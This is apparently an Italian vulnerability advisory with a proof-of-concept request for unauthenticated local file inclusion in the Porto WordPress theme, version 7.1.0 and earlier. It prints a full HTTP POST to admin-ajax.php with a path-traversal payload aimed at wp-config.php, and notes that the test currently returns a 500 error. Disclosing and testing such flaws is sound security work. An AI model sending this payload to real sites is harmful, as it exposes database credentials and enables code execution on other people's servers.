
Porto <= 7.1.0 - Inclusione di file locale non autenticata via porto_ajax_posts
Porto <= 7.1.0 - Inclusione di file locale non autenticata tramite porto_ajax_posts
Il tema Porto per WordPress è vulnerabile all'inclusione di file locale in tutte le versioni fino alla 7.1.0 inclusa tramite la funzione 'porto_ajax_posts'. Ciò rende possibile per attaccanti non autenticati includere ed eseguire file arbitrari sul server, consentendo l'esecuzione di qualsiasi codice PHP in quei file. Questo può essere utilizzato per bypassare i controlli di accesso, ottenere dati sensibili o ottenere l'esecuzione di codice nei casi in cui il tipo di file php può essere caricato e incluso.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
action=porto_ajax_posts&post_type=post&extra={"shortcode":"porto_posts_grid","template":"../../../../wp-config.php"}
Al momento si riceve un errore 500.